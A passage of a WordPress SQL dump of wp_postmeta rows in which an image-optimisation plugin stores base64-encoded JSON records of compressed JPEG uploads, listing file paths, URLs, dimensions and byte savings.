XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS1MtMTIyMC1UcmVhdG1lbnQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9LUy0xMjIwLVRyZWF0bWVudC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0tTLTEyMjAtVHJlYXRtZW50LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NDQ3LCJpZCI6MjQ2MX1d'); 
INSERT INTO `wp_postmeta` VALUES (28810, 2453, 'wpfc_optimisation_reduction', '12234'); 
INSERT INTO `wp_postmeta` VALUES (28811, 2453, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQyMDIzMTgzNS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MjAyMzE4MzUuanBnIiwid2lkdGgiOjY1NDksImhlaWdodCI6NDM2NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0ODQ1MiwiaWQiOiIyNDUzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDIwMjMxODM1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQyMDIzMTgzNS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MjAyMzE4MzUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjcxOSwidGltZSI6MTQ4MzU0ODQ1NSwiaWQiOjI0NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQyMDIzMTgzNS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MjAyMzE4MzUtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDIwMjMxODM1LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxNTQ0LCJ0aW1lIjoxNDgzNTQ4NDU5LCJpZCI6MjQ1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDIwMjMxODM1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQyMDIzMTgzNS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MjAyMzE4MzUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE0NTgsInRpbWUiOjE0ODM1NDg0NjMsImlkIjoyNDUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MjAyMzE4MzUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQyMDIzMTgzNS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQyMDIzMTgzNS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo1NzcwLCJ0aW1lIjoxNDgzNTQ4NDY4LCJpZCI6MjQ1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDIwMjMxODM1LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQyMDIzMTgzNS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MjAyMzE4MzUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUyNiwidGltZSI6MTQ4MzU0ODQ3MSwiaWQiOjI0NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQyMDIzMTgzNS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MjAyMzE4MzUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDIwMjMxODM1LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NDgsInRpbWUiOjE0ODM1NDg0NzQsImlkIjoyNDUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MjAyMzE4MzUtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDIwMjMxODM1LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQyMDIzMTgzNS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDc4LCJ0aW1lIjoxNDgzNTQ4NDc3LCJpZCI6MjQ1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDIwMjMxODM1LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQyMDIzMTgzNS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180MjAyMzE4MzUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEyOTEsInRpbWUiOjE0ODM1NDg0ODEsImlkIjoyNDUzfV0='); 
INSERT INTO `wp_postmeta` VALUES (28812, 2452, 'wpfc_optimisation_reduction', '139239'); 
INSERT INTO `wp_postmeta` VALUES (28813, 2452, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvbm9pc2UtdmlicmF0aW9uLWhhcnNobmVzcy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL25vaXNlLXZpYnJhdGlvbi1oYXJzaG5lc3MuanBnIiwid2lkdGgiOjgxMCwiaGVpZ2h0Ijo0NjEsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9ub2lzZS12aWJyYXRpb24taGFyc2huZXNzLmpwZyIsInJlZHVjdGlvbiI6MTM5MjMyLCJ0aW1lIjoxNDgzNTQ4NDg5LCJpZCI6IjI0NTIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL25vaXNlLXZpYnJhdGlvbi1oYXJzaG5lc3MtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9ub2lzZS12aWJyYXRpb24taGFyc2huZXNzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvbm9pc2UtdmlicmF0aW9uLWhhcnNobmVzcy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODQ5MSwiaWQiOjI0NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvbm9pc2UtdmlicmF0aW9uLWhhcnNobmVzcy04MDB4NDU1LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NDU1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL25vaXNlLXZpYnJhdGlvbi1oYXJzaG5lc3MtODAweDQ1NS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9ub2lzZS12aWJyYXRpb24taGFyc2huZXNzLTgwMHg0NTUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NDk0LCJpZCI6MjQ1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9ub2lzZS12aWJyYXRpb24taGFyc2huZXNzLTc2OHg0MzcuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0MzcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvbm9pc2UtdmlicmF0aW9uLWhhcnNobmVzcy03Njh4NDM3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL25vaXNlLXZpYnJhdGlvbi1oYXJzaG5lc3MtNzY4eDQzNy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg0OTYsImlkIjoyNDUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL25vaXNlLXZpYnJhdGlvbi1oYXJzaG5lc3MtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9ub2lzZS12aWJyYXRpb24taGFyc2huZXNzLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvbm9pc2UtdmlicmF0aW9uLWhhcnNobmVzcy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODQ5OCwiaWQiOjI0NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvbm9pc2UtdmlicmF0aW9uLWhhcnNobmVzcy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL25vaXNlLXZpYnJhdGlvbi1oYXJzaG5lc3MtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9ub2lzZS12aWJyYXRpb24taGFyc2huZXNzLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NTAxLCJpZCI6MjQ1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9ub2lzZS12aWJyYXRpb24taGFyc2huZXNzLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvbm9pc2UtdmlicmF0aW9uLWhhcnNobmVzcy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL25vaXNlLXZpYnJhdGlvbi1oYXJzaG5lc3MtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg1MDQsImlkIjoyNDUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL25vaXNlLXZpYnJhdGlvbi1oYXJzaG5lc3MtNTEweDQ2MS5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjQ2MSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9ub2lzZS12aWJyYXRpb24taGFyc2huZXNzLTUxMHg0NjEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvbm9pc2UtdmlicmF0aW9uLWhhcnNobmVzcy01MTB4NDYxLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODUwOSwiaWQiOjI0NTJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28814, 2445, 'wpfc_optimisation_reduction', '0'); 
INSERT INTO `wp_postmeta` VALUES (28815, 2445, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzE3NDkyNzI3NS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18xNzQ5MjcyNzUuanBnIiwid2lkdGgiOjQyNTYsImhlaWdodCI6MjgzMiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0ODUxNiwiaWQiOiIyNDQ1In1d'); 
INSERT INTO `wp_postmeta` VALUES (28816, 2444, 'wpfc_optimisation_reduction', '151030'); 
INSERT INTO `wp_postmeta` VALUES (28817, 2444, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwva3J5dG94LWNvbXBhcmlzb24uanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9rcnl0b3gtY29tcGFyaXNvbi5qcGciLCJ3aWR0aCI6MTA5MywiaGVpZ2h0Ijo0MjUsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9rcnl0b3gtY29tcGFyaXNvbi5qcGciLCJyZWR1Y3Rpb24iOjE1MTAyMywidGltZSI6MTQ4MzU0ODUyNCwiaWQiOiIyNDQ0In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9rcnl0b3gtY29tcGFyaXNvbi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2tyeXRveC1jb21wYXJpc29uLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwva3J5dG94LWNvbXBhcmlzb24tMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg1MjYsImlkIjoyNDQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2tyeXRveC1jb21wYXJpc29uLTgwMHgzMTEuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0IjozMTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwva3J5dG94LWNvbXBhcmlzb24tODAweDMxMS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9rcnl0b3gtY29tcGFyaXNvbi04MDB4MzExLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODUyOCwiaWQiOjI0NDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwva3J5dG94LWNvbXBhcmlzb24tNzY4eDI5OS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjI5OSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9rcnl0b3gtY29tcGFyaXNvbi03Njh4Mjk5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2tyeXRveC1jb21wYXJpc29uLTc2OHgyOTkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NTMwLCJpZCI6MjQ0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9rcnl0b3gtY29tcGFyaXNvbi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2tyeXRveC1jb21wYXJpc29uLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwva3J5dG94LWNvbXBhcmlzb24tMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg1MzIsImlkIjoyNDQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2tyeXRveC1jb21wYXJpc29uLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwva3J5dG94LWNvbXBhcmlzb24tMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9rcnl0b3gtY29tcGFyaXNvbi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODUzNSwiaWQiOjI0NDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwva3J5dG94LWNvbXBhcmlzb24tMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9rcnl0b3gtY29tcGFyaXNvbi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2tyeXRveC1jb21wY